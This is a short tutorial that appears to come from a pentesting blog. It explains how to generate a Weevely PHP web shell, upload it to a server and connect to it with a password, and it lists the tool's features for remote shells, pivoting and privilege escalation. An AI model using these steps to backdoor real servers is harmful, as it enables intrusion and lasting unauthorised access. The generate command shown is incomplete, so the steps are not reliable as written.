PHP backdoor with Weevely

In this tutorial we will create a backdoor by uploading PHP file on the server and gaining a backdoor.

Weevely comes pre-installed on kali-linux.

Some other features of weevely include:

• Shell access to the target

• SQL console pivoting on the target

• HTTP proxy pivoting on the target

• Upload and download files

• Spawn reverse and direct TCP shells

• Audit remote target security

• Run Meterpreter payloads

• Port scan pivoting on target

• Mount the remote filesystem

• Bruteforce SQL accounts pivoting on the target.

Weevely is a web shell designed for post-exploitation purposes that can be extended over the network at runtime.

Upload weevely PHP agent to a target web server to get remote shell access to it. It has more than 30 modules to assist administrative tasks, maintain access, provide situational awareness, elevate privileges, and spread into the target network.

How to Generate a PHP Backdoor using Weevely?

weevely generate

Upload the 405.php to the sever.

To establish the session:

weevely http://192.168.1.107/405.php 0xcf

More on installation : https://github.com/epinna/weevely3/wiki/Install

Credit: MazenElzanaty @pentesttools

Written on January 28, 2020